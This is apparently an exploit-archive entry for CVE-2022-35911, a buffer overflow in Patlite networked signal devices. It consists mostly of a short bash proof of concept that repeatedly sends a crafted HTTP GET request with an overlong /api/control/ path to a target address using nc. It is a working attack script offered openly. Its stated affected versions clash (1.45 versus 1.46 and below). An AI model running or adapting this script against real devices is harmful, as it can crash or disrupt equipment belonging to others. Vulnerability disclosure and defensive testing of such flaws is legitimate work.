Patlite 1.46 Buffer Overflow

Patlite versions 1.45 and below suffer from a buffer overflow vulnerability.


SHA-256 | 5c29e3afa128083754b4bac9a8b929fac03751344f5c65c15f43df42fefcb136

# Exploit Title: CVE-2022-35911 - Patlite Overflow.
# Date: 2022-07-07
# Exploit Author: Samy Younsi - Necrum Security Labs
# Vendor Homepage: https://www.patlite.co.jp
# Software Link: https://www.patlite.co.jp/product/detail0000021462.html
# Version: Versions 1.46 and bellow are affected
# Tested on: CentOs & Ubuntu
# CVE : CVE-2022-35911


#!/bin/bash

IP="192.168.1.101"
PORT="80"

for i in {0..1000};
do
echo "[$i]: ";
echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT;
done > /dev/null 2>&1

Related Posts